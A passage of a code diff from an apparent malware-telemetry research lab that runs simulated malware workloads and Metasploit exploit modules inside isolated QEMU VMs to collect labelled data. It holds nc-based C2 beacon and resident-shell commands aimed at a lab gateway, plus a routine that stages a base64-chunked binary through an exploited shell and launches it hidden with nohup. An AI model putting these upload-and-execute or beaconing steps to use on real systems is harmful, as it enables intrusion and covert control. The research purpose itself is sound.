" for n in 1 2 3 4 5 6 7 8; do\n"
" dd if=/dev/urandom of=/tmp/.cis490-victim/f$n bs=4k count=64 2>/dev/null\n"
" done\n"
" for f in /tmp/.cis490-victim/*; do cat $f > /dev/null; done\n"
" sleep 1\n"
)
w = _wrap_loop("io-walk", body)
return Workload(
profile="io-walk",
start_cmd=w.start_cmd,
stop_cmd=w.stop_cmd,
description="FS traversal + random-data writes, periodic re-read",
)
def _bursty_c2() -> Workload:
"""Dridex-class — long idle, periodic small TCP burst to a fixed
peer (the bridge gateway). nc-based for busybox compatibility."""
body = (
" sleep 25\n"
" for i in 1 2 3; do\n"
" echo c2-beacon-$$-$i | nc -w 1 10.200.0.1 4445 >/dev/null 2>&1\n"
" sleep 1\n"
" done\n"
)
w = _wrap_loop("bursty-c2", body)
return Workload(
profile="bursty-c2",
start_cmd=w.start_cmd,
stop_cmd=w.stop_cmd,
description="Long idle + periodic 3-packet egress burst to gateway",
)
def _low_and_slow() -> Workload:
"""Kovter-class — low CPU, periodic memory churn, no on-disk
artifact. The hardest envelope to label from /proc alone."""
body = (
" sleep 8\n"
" awk 'BEGIN { for(i=0;i<200000;i++) a[i]=i*i; }' >/dev/null 2>&1\n"
" sleep 4\n"
)
w = _wrap_loop("low-and-slow", body)
return Workload(
profile="low-and-slow",
start_cmd=w.start_cmd,
stop_cmd=w.stop_cmd,
description="Periodic memory churn (~200k array allocs) on a slow cycle",
)
def _shell_resident() -> Workload:
"""RAT-style — keep a single TCP connection open to the gateway
with occasional command bursts. Long-lived flow, small bytes.
Uses ``nc -w`` on the busybox-compatible path. We pipe a slow
feed into nc so the connection stays open for ~30 s before the
-w idle timeout closes it, matching the long-lived-flow shape.
Then we sleep + reconnect, producing the periodic-tick pattern."""
body = (
" ( for i in 1 2 3 4 5 6; do\n"
" echo cmd-tick-$i\n"
" sleep 5\n"
" done ) | nc -w 30 10.200.0.1 4446 >/dev/null 2>&1\n"
" sleep 5\n"
)
w = _wrap_loop("shell-resident", body)
return Workload(
profile="shell-resident",
start_cmd=w.start_cmd,
stop_cmd=w.stop_cmd,
description="Resident TCP connection to gateway with periodic ticks",
)
_FACTORIES = {
"cpu-saturate": _cpu_saturate,
"scan-and-dial": _scan_and_dial,
"io-walk": _io_walk,
"bursty-c2": _bursty_c2,
"low-and-slow": _low_and_slow,
"shell-resident": _shell_resident,
}
def workload_for(sample: Sample | None) -> Workload | None:
"""Return the Workload matching ``sample.profile``, or None when
no sample is supplied (driver v1 fallback path)."""
if sample is None:
return None
factory = _FACTORIES.get(sample.profile)
if factory is None:
log.warning("no workload profile for %r; falling back to cpu-saturate", sample.profile)
return _cpu_saturate()
return factory()
def all_profiles() -> list[str]:
return sorted(_FACTORIES.keys())
# ---------------------------------------------------------------------------
# Tier-4 path: real-binary upload + execute inside the shell session
# ---------------------------------------------------------------------------
@dataclass(frozen=True)
class ChunkedUpload:
"""Multi-step upload plan. Each chunk is one ``shell_write`` call;
the driver issues them in order, then a final integrity check, then
the exec command. The last command runs the binary and writes its
PID to ``pid_path``."""
profile: str
chunks: tuple[str, ...] # each is a complete shell command
finalize_cmd: str # decode + verify sha256 + chmod
exec_cmd: str # actually launch the binary
stop_cmd: str
bin_path: str
pid_path: str
expected_sha256: str
n_chunks: int
# Conservative chunk size: msfrpc shell_write payloads are reliable
# under ~16 KiB (single TCP write inside the framework). Use 8 KiB of
# *base64* (which is 6 KiB of binary) per chunk so we leave room for
# the wrapper and stay well under the limit.
_CHUNK_B64_BYTES = 8 * 1024
def chunked_real_binary_upload(
binary_bytes: bytes,
sample: Sample | None = None,
) -> ChunkedUpload:
"""Plan a chunked upload of ``binary_bytes`` into a shell session.
First chunk creates an empty file; subsequent chunks append a
base64 segment. ``finalize_cmd`` decodes + sha256-verifies the
result; ``exec_cmd`` launches the binary and stashes its PID.
The driver issues these as separate shell_writes so we never
push more than ~10 KiB through msfrpc in a single call."""
import base64 as _b64
import hashlib as _hashlib
profile = (sample.profile if sample else "real-binary")
pid_path = f"/tmp/.cis490-real-{profile}.pid"
bin_path = f"/tmp/.cis490-real-{profile}.bin"
b64_path = f"/tmp/.cis490-real-{profile}.b64"
sha = _hashlib.sha256(binary_bytes).hexdigest()
encoded = _b64.b64encode(binary_bytes).decode("ascii")
chunks: list[str] = []
chunks.append(f"mkdir -p /tmp; : > {b64_path}; echo upload-begin")
for i in range(0, len(encoded), _CHUNK_B64_BYTES):
seg = encoded[i:i + _CHUNK_B64_BYTES]
# printf '%s' avoids interpreting '%' / '\\' inside the b64 chars.
chunks.append(f"printf '%s' '{seg}' >> {b64_path}")
finalize = (
f"base64 -d {b64_path} > {bin_path} && rm -f {b64_path} && "
f"chmod +x {bin_path} && "
f"GOT=$(sha256sum {bin_path} | awk '{{print $1}}') && "
f"if [ \"$GOT\" = \"{sha}\" ]; then echo sha-ok; "
f"else echo sha-mismatch:$GOT; rm -f {bin_path}; false; fi"
)
exec_cmd = (
f"nohup {bin_path} </dev/null >/dev/null 2>&1 & "
f"echo $! > {pid_path}; disown; echo exec-ok"
)
stop = (
f"if [ -f {pid_path} ]; then "
f" kill -- -$(cat {pid_path}) 2>/dev/null; "
f" kill $(cat {pid_path}) 2>/dev/null; "
f" rm -f {pid_path} {bin_path}; "
f"fi; true"
)
return ChunkedUpload(
profile=f"real:{profile}",
chunks=tuple(chunks),
finalize_cmd=finalize,
exec_cmd=exec_cmd,
stop_cmd=stop,
bin_path=bin_path,
pid_path=pid_path,
expected_sha256=sha,
n_chunks=len(chunks),
)
def real_binary_workload(binary_bytes: bytes, sample: Sample | None = None) -> Workload:
"""Backwards-compat wrapper that produces a single-shot Workload
by concatenating a chunked plan into one start_cmd. Kept for
callers that drive the v1 single-shell-write flow (e.g. tests).
Production path: the driver should call ``chunked_real_binary_upload``
and walk the chunks itself so msfrpc never sees a buffer-busting
payload."""
plan = chunked_real_binary_upload(binary_bytes, sample=sample)
start = "\n".join(list(plan.chunks) + [plan.finalize_cmd, plan.exec_cmd]) + "\n"
return Workload(
profile=plan.profile,
start_cmd=start,
stop_cmd=plan.stop_cmd,
description=f"Real binary upload+execute ({len(binary_bytes)} bytes, {plan.n_chunks} chunks)",
)

View file

@ -36,7 +36,8 @@ from datetime import datetime, timezone
from pathlib import Path
from typing import Callable
from collectors import proc_qemu
from collectors import guest_agent, pcap, perf_qemu, proc_qemu, qmp
from samples.manifest import Sample
from .ulid import new_ulid
@ -61,6 +62,38 @@ class EpisodeConfig:
# When set, walk this schedule and ignore duration_s for sleep timing.
# ``duration_s`` still goes in meta.schedule for record-keeping.
phase_schedule: PhaseSchedule | None = None
# Optional: paths to QEMU sockets exposed by the launcher. When
# set, EpisodeRunner spins up additional collector threads.
qmp_socket: Path | None = None
qmp_interval_ms: int = 1000 # QMP queries are heavier than /proc reads
guest_agent_socket: Path | None = None
# Optional: bridge interface to capture per-episode pcap on. When
# set, EpisodeRunner spawns tcpdump for the duration of the
# schedule and bucketizes the result into netflow.jsonl on stop.
bridge_iface: str | None = None
bridge_ip: str = "10.200.0.1"
pcap_snaplen: int = 256
# Source 3: perf stat sampling. Disabled by default because perf
# needs CAP_SYS_ADMIN or perf_event_paranoid <= 1; enable
# explicitly per-episode when the host supports it.
enable_perf: bool = False
perf_interval_ms: int = 100
# The Sample that drove this episode's workload selection. Stamped
# into meta.json so trainers can join episodes by family / kind
# without re-deriving from events. None = v1 yes-loop fallback.
sample: Sample | None = None
# The exploit module that fired (Tier 3+). Plain dict so the runner
# doesn't need to import exploits.modules; populated by callers
# that have a ModuleConfig in hand.
exploit_meta: dict | None = None
# Snapshot/revert (Tier 0+):
# revert_at_start — before any phase walks, loadvm <snapshot_name>.
# Use this to drop the guest back to a known-good baseline at
# the start of every episode in a long-lived-VM fleet loop.
# revert_at_end — after the schedule walks, loadvm <snapshot_name>
# so the next consumer of this VM starts clean too.
revert_at_start: bool = False
revert_at_end: bool = False
@dataclass
@ -68,8 +101,13 @@ class EpisodeResult:
episode_id: str
episode_dir: Path
rows_proc: int
pid_disappeared: bool
duration_observed_s: float
rows_qmp: int = 0
rows_guest: int = 0
rows_netflow: int = 0
rows_perf: int = 0
pcap_bytes: int = 0
pid_disappeared: bool = False
duration_observed_s: float = 0.0
phases_observed: list[str] = field(default_factory=list)
@ -83,25 +121,73 @@ class EpisodeRunner:
self.on_phase = on_phase
self.episode_id = cfg.episode_id or new_ulid()
self.episode_dir: Path = cfg.data_root / "episodes" / self.episode_id
# Create the dir up front so external drivers can call
# emit_event() between construction and run() — e.g. an exploit
# driver that writes a driver_setup event before the schedule
# walks. The dir is otherwise empty until run() opens files.
self.episode_dir.mkdir(parents=True, exist_ok=True)
self._t_mono_origin_ns: int = 0
self._stop = threading.Event()
# ---- public ---------------------------------------------------------
def run(self) -> EpisodeResult:
self.episode_dir.mkdir(parents=True, exist_ok=True)
self._t_mono_origin_ns = time.monotonic_ns()
started_at_wall = datetime.now(timezone.utc).isoformat()
# snapshot_load is the marker for "episode clock = 0". Emit
# BEFORE any file I/O — _write_meta() takes >1 ms on slow disks
# (Refs spectral/CIS490#7).
self.emit_event("snapshot_load", snapshot=self.cfg.snapshot_name)
started_at_wall = datetime.now(timezone.utc).isoformat()
meta = self._initial_meta(started_at_wall)
self._write_meta(meta)
self._emit_event(0, "snapshot_load", snapshot=self.cfg.snapshot_name)
# Snapshot revert at start: pause+restore the guest to a known
# baseline before phase 0. Requires QMP and a savevm having
# already taken place (the launcher is responsible for that).
if self.cfg.revert_at_start and self.cfg.qmp_socket is not None:
try:
client = qmp.QMPClient(self.cfg.qmp_socket)
client.connect()
try:
out = client.loadvm(self.cfg.snapshot_name)
self.emit_event(
"snapshot_revert",
when="start",
snapshot=self.cfg.snapshot_name,
output=(out or "").strip()[:256],
)
finally:
client.close()
except Exception as e:
log.warning("loadvm at start failed: %s", e)
self.emit_event(
"snapshot_revert_failed",
when="start",
snapshot=self.cfg.snapshot_name,
error=str(e),
)
rows_holder: dict[str, int] = {"rows": 0}
rows_holder: dict[str, int] = {"proc": 0, "qmp": 0, "guest": 0, "netflow": 0, "perf": 0}
pcap_handle: pcap.CaptureHandle | None = None
pcap_path = self.episode_dir / "network.pcap"
netflow_path = self.episode_dir / "netflow.jsonl"
if self.cfg.bridge_iface:
try:
pcap_handle = pcap.run_capture(
bridge=self.cfg.bridge_iface,
pcap_path=pcap_path,
snaplen=self.cfg.pcap_snaplen,
)
self.emit_event("pcap_started", iface=self.cfg.bridge_iface)
except (OSError, FileNotFoundError) as e:
log.warning("pcap capture not available on %s: %s",
self.cfg.bridge_iface, e)
self.emit_event("pcap_unavailable",
iface=self.cfg.bridge_iface, error=str(e))
def _collector() -> None:
rows_holder["rows"] = proc_qemu.run_loop(
def _proc_collector() -> None:
rows_holder["proc"] = proc_qemu.run_loop(
pid=self.cfg.target_pid,
output_path=self.episode_dir / "telemetry-proc.jsonl",
t_mono_origin_ns=self._t_mono_origin_ns,
@ -109,8 +195,44 @@ class EpisodeRunner:
stop_event=self._stop,
)
t = threading.Thread(target=_collector, daemon=True, name="proc_qemu")
t.start()
def _qmp_collector() -> None:
assert self.cfg.qmp_socket is not None
rows_holder["qmp"] = qmp.run_loop(
socket_path=self.cfg.qmp_socket,
output_path=self.episode_dir / "telemetry-qmp.jsonl",
t_mono_origin_ns=self._t_mono_origin_ns,
interval_ms=self.cfg.qmp_interval_ms,
stop_event=self._stop,
)
def _guest_collector() -> None:
assert self.cfg.guest_agent_socket is not None
rows_holder["guest"] = guest_agent.run_loop(
socket_path=self.cfg.guest_agent_socket,
output_path=self.episode_dir / "telemetry-guest.jsonl",
t_mono_origin_ns=self._t_mono_origin_ns,
stop_event=self._stop,
)
def _perf_collector() -> None:
rows_holder["perf"] = perf_qemu.run_loop(
pid=self.cfg.target_pid,
output_path=self.episode_dir / "telemetry-perf.jsonl",
t_mono_origin_ns=self._t_mono_origin_ns,
interval_ms=self.cfg.perf_interval_ms,
stop_event=self._stop,
)
threads: list[threading.Thread] = []
threads.append(threading.Thread(target=_proc_collector, daemon=True, name="proc_qemu"))
if self.cfg.qmp_socket is not None:
threads.append(threading.Thread(target=_qmp_collector, daemon=True, name="qmp"))
if self.cfg.guest_agent_socket is not None:
threads.append(threading.Thread(target=_guest_collector, daemon=True, name="guest_agent"))
if self.cfg.enable_perf:
threads.append(threading.Thread(target=_perf_collector, daemon=True, name="perf"))
for t in threads:
t.start()
phases_observed: list[str] = []
try:
@ -121,21 +243,60 @@ class EpisodeRunner:
phases_observed = ["clean"]
self._stop.wait(timeout=self.cfg.duration_s)
finally:
self._stop.set()
t.join(timeout=2.0)
# Optional revert before stopping collectors so the
# transition shows up in their telemetry too — useful for
# building "snapshot revert" as a labeled phase later.
if self.cfg.revert_at_end and self.cfg.qmp_socket is not None:
try:
client = qmp.QMPClient(self.cfg.qmp_socket)
client.connect()
try:
out = client.loadvm(self.cfg.snapshot_name)
self.emit_event(
"snapshot_revert",
when="end",
snapshot=self.cfg.snapshot_name,
output=(out or "").strip()[:256],
)
finally:
client.close()
except Exception as e:
log.warning("loadvm at end failed: %s", e)
self.emit_event(
"snapshot_revert_failed",
when="end",
snapshot=self.cfg.snapshot_name,
error=str(e),
)
self._stop.set()
for t in threads:
t.join(timeout=3.0)
if pcap_handle is not None:
rc = pcap.stop_capture(pcap_handle)
self.emit_event("pcap_stopped", rc=rc,
pcap_bytes=pcap_path.stat().st_size if pcap_path.exists() else 0)
rows_holder["netflow"] = pcap.bucketize(
pcap_path, netflow_path,
bucket_ms=100,
t_mono_origin_ns=self._t_mono_origin_ns,
bridge_ip=self.cfg.bridge_ip,
)
end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
pid_alive = _pid_alive(self.cfg.target_pid)
self._emit_event(
end_mono_ns,
"episode_end",
target_pid_alive=pid_alive,
)
self.emit_event("episode_end", target_pid_alive=pid_alive)
end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
meta["ended_at_wall"] = datetime.now(timezone.utc).isoformat()
pcap_size = pcap_path.stat().st_size if pcap_path.exists() else 0
meta["result"] = {
"phases_observed": phases_observed,
"rows_proc": rows_holder["rows"],
"rows_proc": rows_holder["proc"],
"rows_qmp": rows_holder["qmp"],
"rows_guest": rows_holder["guest"],
"rows_perf": rows_holder["perf"],
"rows_netflow": rows_holder["netflow"],
"pcap_bytes": pcap_size,
"pid_alive_at_end": pid_alive,
"duration_observed_s": end_mono_ns / 1_000_000_000,
}
@ -143,16 +304,22 @@ class EpisodeRunner:
(self.episode_dir / "done.marker").touch()
log.info(
"episode %s complete: rows=%d duration=%.2fs phases=%s",
"episode %s complete: proc=%d qmp=%d guest=%d perf=%d netflow=%d pcap=%dB duration=%.2fs phases=%s",
self.episode_id,
rows_holder["rows"],
rows_holder["proc"], rows_holder["qmp"], rows_holder["guest"],
rows_holder["perf"], rows_holder["netflow"], pcap_size,
end_mono_ns / 1e9,
phases_observed,
)
return EpisodeResult(
episode_id=self.episode_id,
episode_dir=self.episode_dir,
rows_proc=rows_holder["rows"],
rows_proc=rows_holder["proc"],
rows_qmp=rows_holder["qmp"],
rows_guest=rows_holder["guest"],
rows_netflow=rows_holder["netflow"],
rows_perf=rows_holder["perf"],
pcap_bytes=pcap_size,
pid_disappeared=not pid_alive,
duration_observed_s=end_mono_ns / 1_000_000_000,
phases_observed=phases_observed,
@ -171,9 +338,7 @@ class EpisodeRunner:
break
t_mono = time.monotonic_ns() - self._t_mono_origin_ns
self._emit_label(t_mono, phase, prev=prev, reason="scheduled")
self._emit_event(
t_mono, "phase_transition", to=phase, prev=prev
)
self.emit_event("phase_transition", to=phase, prev=prev)
if self.on_phase is not None:
try:
self.on_phase(phase)
@ -185,6 +350,17 @@ class EpisodeRunner:
return observed
def _initial_meta(self, started_at_wall: str) -> dict:
sample_meta: dict | None = None
if self.cfg.sample is not None:
s = self.cfg.sample
sample_meta = {
"name": s.name,
"family": s.family,
"category": s.category,
"profile": s.profile,
"kind": s.kind,
"sha256": s.sha256,
}
return {
"episode_id": self.episode_id,
"schema_version": SCHEMA_VERSION,
@ -202,8 +378,8 @@ class EpisodeRunner:
"ram_mib": None,
"target_pid": self.cfg.target_pid,
},
"exploit": None,
"sample": None,
"exploit": self.cfg.exploit_meta,
"sample": sample_meta,
"schedule": {
"baseline_seconds": self.cfg.duration_s,
"interval_ms": self.cfg.interval_ms,
@ -220,7 +396,15 @@ class EpisodeRunner:
f.write("\n")
os.replace(tmp, path)
def _emit_event(self, t_mono_ns: int, event: str, **extra) -> None:
def emit_event(self, event: str, **extra) -> None:
"""Append a row to events.jsonl. Public so external drivers
(e.g. the MSF exploit driver) can stamp their own events with
the same monotonic clock the orchestrator is using."""
t_mono_ns = (
time.monotonic_ns() - self._t_mono_origin_ns
if self._t_mono_origin_ns
else 0
)
row = {
"t_mono_ns": t_mono_ns,
"t_wall_ns": time.time_ns(),

467
orchestrator/fleet.py Normal file
View file

@ -0,0 +1,467 @@
"""Fleet runner — concurrent VM episodes with resource awareness.
The lab host detects its own capacity, picks how many VMs to run in
parallel without driving the box into swap or starving the host
itself, and runs that many episodes simultaneously. Each slot gets a
distinct ``Sample`` from the manifest (deterministically chosen by
host_id + slot index), so every concurrent VM produces novel,
labelable data.
Capacity heuristic defaults documented inline so they're auditable:
cores_total = os.cpu_count()
cores_reserved = max(1, cores_total // 8) # host + collectors
ram_per_vm_mib = 320 # Alpine fits in 256
# but leave 64 for
# overhead (qemu+ovmf)
ram_headroom_mib = max(1024, ram_total // 8) # never starve host
max_by_cores = cores_total - cores_reserved
max_by_ram = (ram_available - ram_headroom) // ram_per_vm
max_by_load = if (load_1m / cores) > 0.75: tighter cap
The smallest of these wins. The reasoning string is logged + saved
into each episode's meta.json under ``fleet`` so post-hoc analysis
can correlate "this episode was run when 6 VMs were concurrent" with
its observed envelope.
"""
from __future__ import annotations
import logging
import os
import shutil
import signal
import subprocess
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass, field
from pathlib import Path
from exploits.modules import (
ModuleConfig, load_module_configs, module_target_port, select_module,
)
from samples.manifest import Sample, SampleManifest
log = logging.getLogger("cis490.fleet")
def _msfrpcd_available(host: str = "127.0.0.1", port: int = 55553) -> bool:
"""True when msfrpcd is listening — gate for the Tier-3 default.
A Tier-2 fallback runs when msfrpcd isn't there (still useful
data, just labeled with no-exploit so the trainer can filter)."""
import socket as _sk
try:
with _sk.create_connection((host, port), timeout=0.3):
return True
except OSError:
return False
@dataclass(frozen=True)
class FleetCapacity:
cores_total: int
cores_reserved: int
ram_total_mib: int
ram_available_mib: int
ram_per_vm_mib: int
ram_headroom_mib: int
load_1m: float
max_by_cores: int
max_by_ram: int
max_by_load: int
max_concurrent: int
rationale: str
def to_dict(self) -> dict:
return {
"cores_total": self.cores_total,
"cores_reserved": self.cores_reserved,
"ram_total_mib": self.ram_total_mib,
"ram_available_mib": self.ram_available_mib,
"ram_per_vm_mib": self.ram_per_vm_mib,
"ram_headroom_mib": self.ram_headroom_mib,
"load_1m": self.load_1m,
"max_by_cores": self.max_by_cores,
"max_by_ram": self.max_by_ram,
"max_by_load": self.max_by_load,
"max_concurrent": self.max_concurrent,
"rationale": self.rationale,
}
@dataclass
class FleetConfig:
host_id: str
repo_root: Path
data_root: Path
manifest: SampleManifest
# Module catalog for Tier-3 dispatch. Required for fleet-driven
# exploit-fire variety; empty catalog forces Tier-2 fallback.
modules: dict[str, ModuleConfig] = field(default_factory=dict)
# VM resource shape — must match what the launcher requests.
ram_per_vm_mib: int = 320
# Cap concurrency below the calculated max (e.g. for a smoke test).
max_concurrent_override: int | None = None
# Skip episodes whose sample requires a real binary that's not present.
require_real_samples: bool = False
# Force Tier-2 even when msfrpcd is up; used by tests + dev runs
# that want a no-exploit baseline.
force_tier2: bool = False
# msfrpcd connectivity (read by tier-3 driver via env).
msfrpcd_host: str = "127.0.0.1"
msfrpcd_port: int = 55553
def _read_meminfo() -> dict[str, int]:
out: dict[str, int] = {}
try:
with open("/proc/meminfo") as f:
for line in f:
k, _, rest = line.partition(":")
v = rest.strip()
if v.endswith(" kB"):
try:
out[k] = int(v[:-3]) * 1024
except ValueError:
pass
except OSError:
pass
return out
def _read_loadavg() -> float:
try:
with open("/proc/loadavg") as f:
return float(f.read().split()[0])
except (OSError, ValueError, IndexError):
return 0.0
def detect_capacity(*, ram_per_vm_mib: int = 320) -> FleetCapacity:
cores_total = os.cpu_count() or 1
# Reserve at least 1 core, more if the host has many.
cores_reserved = max(1, cores_total // 8)
mem = _read_meminfo()
ram_total_b = mem.get("MemTotal", 0)
ram_avail_b = mem.get("MemAvailable", ram_total_b)
ram_total_mib = ram_total_b // (1024 * 1024)
ram_available_mib = ram_avail_b // (1024 * 1024)
# Never starve the host of more than ~7/8 of its memory.
ram_headroom_mib = max(1024, ram_total_mib // 8)
load_1m = _read_loadavg()
max_by_cores = max(0, cores_total - cores_reserved)
if ram_per_vm_mib <= 0:
max_by_ram = max_by_cores
else:
max_by_ram = max(0, (ram_available_mib - ram_headroom_mib) // ram_per_vm_mib)
# Load-based cap: if the host is already busy, run fewer VMs.
if cores_total and load_1m / cores_total > 0.75:
# Halve, floor 1.
max_by_load = max(1, max_by_cores // 2)
else:
max_by_load = max_by_cores
candidates = [max_by_cores, max_by_ram, max_by_load]
max_concurrent = max(0, min(candidates))
binding = ["cores", "ram", "load"][candidates.index(max_concurrent)] \
if max_concurrent < max_by_cores else "cores"
rationale = (
f"cores_total={cores_total} reserved={cores_reserved} "
f"ram_avail_mib={ram_available_mib} headroom={ram_headroom_mib} "
f"per_vm={ram_per_vm_mib} load_1m={load_1m:.2f} "
f"-> max_concurrent={max_concurrent} (binding={binding})"
)
log.info("capacity: %s", rationale)
return FleetCapacity(
cores_total=cores_total,
cores_reserved=cores_reserved,
ram_total_mib=ram_total_mib,
ram_available_mib=ram_available_mib,
ram_per_vm_mib=ram_per_vm_mib,
ram_headroom_mib=ram_headroom_mib,
load_1m=load_1m,
max_by_cores=max_by_cores,
max_by_ram=max_by_ram,
max_by_load=max_by_load,
max_concurrent=max_concurrent,
rationale=rationale,
)
# ---------------------------------------------------------------------------
# Per-slot episode execution
# ---------------------------------------------------------------------------
@dataclass
class SlotResult:
slot: int
sample_name: str
sample_kind: str
episode_id: str | None
rc: int
duration_s: float
tier: str = "tier2" # "tier3" when an exploit fired
module_name: str | None = None # exploit module identifier (Tier 3 only)
error: str | None = None
extra: dict = field(default_factory=dict)
def _run_slot(
cfg: FleetConfig,
slot: int,
sample: Sample,
episode_index: int,
capacity: FleetCapacity,
) -> SlotResult:
"""Run one episode in a dedicated slot.
Dispatch:
- Tier 3 (default when msfrpcd is listening AND a module catalog
is populated): real exploit fire via run_tier3_demo.py with a
deterministically-selected module + sample.
- Tier 2 (fallback): no exploit; the controller drives a labeled
workload directly via the serial console. Recorded in
SlotResult.tier so trainers can filter the no-exploit episodes.
"""
# Per-slot run dir keeps QEMU sockets + pidfiles isolated. Without
# this, parallel slots rmtree each other's run dir mid-boot.
run_dir_base = "/tmp/cis490-vm-fleet"
# Decide tier.
bridge_iface = os.environ.get("BRIDGE") or None
# Filter the catalog to modules that can actually fire under the
# current launcher mode. Reverse / bind shells require the host-
# only bridge (no SLIRP+restrict=on guest egress), so skip those
# when BRIDGE isn't set; otherwise the exploit fires but the
# session never lands and the episode degenerates to a 30 s
# session_open_timeout.
if cfg.modules:
if bridge_iface:
usable_modules = dict(cfg.modules)
else:
usable_modules = {
k: v for k, v in cfg.modules.items() if not v.requires_bridge
}
else:
usable_modules = {}
tier3_ready = (
not cfg.force_tier2
and bool(usable_modules)
and _msfrpcd_available(cfg.msfrpcd_host, cfg.msfrpcd_port)
)
env = os.environ.copy()
env["SLOT"] = str(slot)
env["SAMPLE_NAME"] = sample.name
env["SAMPLE_PROFILE"] = sample.profile
env["SAMPLE_KIND"] = sample.kind
env["FLEET_HOST_ID"] = cfg.host_id
env["FLEET_EPISODE_INDEX"] = str(episode_index)
env["FLEET_MAX_CONCURRENT"] = str(capacity.max_concurrent)
venv_py = cfg.repo_root / ".venv" / "bin" / "python"
py = str(venv_py) if venv_py.exists() else "python3"
log_dir = cfg.data_root / "fleet-logs"
log_dir.mkdir(parents=True, exist_ok=True)
out_log = log_dir / f"slot-{slot}-ep-{episode_index}.log"
if tier3_ready:
module = select_module(
usable_modules,
host_id=cfg.host_id, slot=slot, episode_index=episode_index,
)
target_port = module_target_port(module) or 21
# Per-slot runner dir for the target VM.
run_dir = f"{run_dir_base}-target-{slot}"
env["RUN_DIR"] = run_dir
# Each slot gets a unique host-side hostfwd port so concurrent
# targets don't collide on the loopback port.
env["PORT_BASE"] = str(target_port + slot * 1000)
if bridge_iface:
env["BRIDGE"] = bridge_iface
cmd = [
py,
str(cfg.repo_root / "tools" / "run_tier3_demo.py"),
"--data-root", str(cfg.data_root),
"--run-dir", run_dir,
"--module", module.name,
"--sample", sample.name,
"--target-port", str(target_port + slot * 1000),
]
tier = "tier3"
module_name: str | None = module.name
else:
run_dir = f"{run_dir_base}-{slot}"
env["RUN_DIR"] = run_dir
cmd = [
py,
str(cfg.repo_root / "tools" / "run_real_vm_demo.py"),
"--data-root", str(cfg.data_root),
"--run-dir", run_dir,
"--sample", sample.name,
]
tier = "tier2"
module_name = None
if not cfg.force_tier2 and not cfg.modules:
log.warning("slot=%d falling back to Tier 2: empty module catalog", slot)
elif not cfg.force_tier2:
log.warning("slot=%d falling back to Tier 2: msfrpcd unreachable at %s:%d",
slot, cfg.msfrpcd_host, cfg.msfrpcd_port)
log.info(
"slot=%d ep=%d tier=%s sample=%s module=%s run_dir=%s",
slot, episode_index, tier, sample.name, module_name, run_dir,
)
started = time.monotonic()
try:
with out_log.open("ab") as logf:
proc = subprocess.run(
cmd,
cwd=str(cfg.repo_root),
env=env,
stdout=logf,
stderr=subprocess.STDOUT,
check=False,
)
rc = proc.returncode
err = None
except (OSError, subprocess.SubprocessError) as e:
rc = -1
err = str(e)
duration = time.monotonic() - started
return SlotResult(
slot=slot,
sample_name=sample.name,
sample_kind=sample.kind,
episode_id=None,
rc=rc,
duration_s=duration,
tier=tier,
module_name=module_name,
error=err,
)
# ---------------------------------------------------------------------------
# FleetRunner
# ---------------------------------------------------------------------------
@dataclass
class FleetRunResult:
capacity: FleetCapacity
slots: list[SlotResult]
total_duration_s: float
class FleetRunner:
def __init__(self, cfg: FleetConfig) -> None:
self.cfg = cfg
self._stop = threading.Event()
def stop(self) -> None:
self._stop.set()
def run(
self,
*,
episodes: int = 1,
episode_index_base: int = 0,
capacity_override: FleetCapacity | None = None,
) -> FleetRunResult:
capacity = capacity_override or detect_capacity(
ram_per_vm_mib=self.cfg.ram_per_vm_mib,
)
n_slots = capacity.max_concurrent
if self.cfg.max_concurrent_override is not None:
n_slots = min(n_slots, self.cfg.max_concurrent_override)
if n_slots <= 0:
log.warning(
"fleet capacity is zero (%s); cannot run", capacity.rationale,
)
return FleetRunResult(
capacity=capacity, slots=[], total_duration_s=0.0,
)
log.info(
"fleet host=%s slots=%d episodes=%d manifest_size=%d",
self.cfg.host_id, n_slots, episodes, len(self.cfg.manifest),
)
all_results: list[SlotResult] = []
t_start = time.monotonic()
for ep in range(episodes):
if self._stop.is_set():
break
episode_index = episode_index_base + ep
slot_samples = [
self.cfg.manifest.select(
host_id=self.cfg.host_id,
slot=slot,
episode_index=episode_index,
)
for slot in range(n_slots)
]
if self.cfg.require_real_samples:
slot_samples = [s for s in slot_samples if s.kind == "real"]
if not slot_samples:
log.warning("require_real_samples: no real samples in manifest; skipping wave")
continue
log.info(
"wave %d/%d: %s",
ep + 1, episodes,
[(i, s.name, s.kind) for i, s in enumerate(slot_samples)],
)
with ThreadPoolExecutor(max_workers=n_slots) as pool:
futures = [
pool.submit(
_run_slot, self.cfg, slot, sample, episode_index, capacity,
)
for slot, sample in enumerate(slot_samples)
]
for fut in as_completed(futures):
res = fut.result()
log.info(
"slot %d sample=%s rc=%d duration=%.1fs",
res.slot, res.sample_name, res.rc, res.duration_s,
)
all_results.append(res)
total = time.monotonic() - t_start
return FleetRunResult(
capacity=capacity,
slots=all_results,
total_duration_s=total,
)
# ---------------------------------------------------------------------------
# Friendly capacity report (used by tools/run_fleet.py --capacity)
# ---------------------------------------------------------------------------
def capacity_report() -> str:
c = detect_capacity()
return (
f"cores: {c.cores_total} (reserve {c.cores_reserved})\n"
f"ram: {c.ram_total_mib} MiB total, {c.ram_available_mib} MiB available "
f"(headroom {c.ram_headroom_mib} MiB, per-vm {c.ram_per_vm_mib} MiB)\n"
f"load: 1m={c.load_1m:.2f}\n"
f"caps: by_cores={c.max_by_cores}, by_ram={c.max_by_ram}, "
f"by_load={c.max_by_load}\n"
f"--> max_concurrent VMs: {c.max_concurrent}\n"
)

View file

@ -6,6 +6,7 @@ requires-python = ">=3.11"
dependencies = [
"starlette>=0.36",
"uvicorn[standard]>=0.27",
"msgpack>=1.0", # MSF RPC wire format for the Tier-3 exploit driver
]
[dependency-groups]

View file

@ -2,6 +2,7 @@ from __future__ import annotations
import logging
import secrets
import time
from pathlib import Path
from typing import Awaitable, Callable
@ -17,6 +18,7 @@ log = logging.getLogger("cis490.receiver")
SUFFIX = ".tar.zst"
SCHEMA_VERSION = 1
def _bearer_check(request: Request, expected: str | None) -> Response | None:
@ -40,6 +42,23 @@ def make_app(
async def health(request: Request) -> JSONResponse:
return JSONResponse({"status": "ok"})
async def ping(request: Request) -> JSONResponse:
"""Smoke-test endpoint. Verifies that the auth layer and the
WG/Caddy/receiver pipe are alive end-to-end without persisting
anything index.jsonl is untouched. Used by ``cis490-shipper
--ping`` during initial bring-up of a new lab host."""
guard = _bearer_check(request, bearer_token)
if guard is not None:
return guard
return JSONResponse(
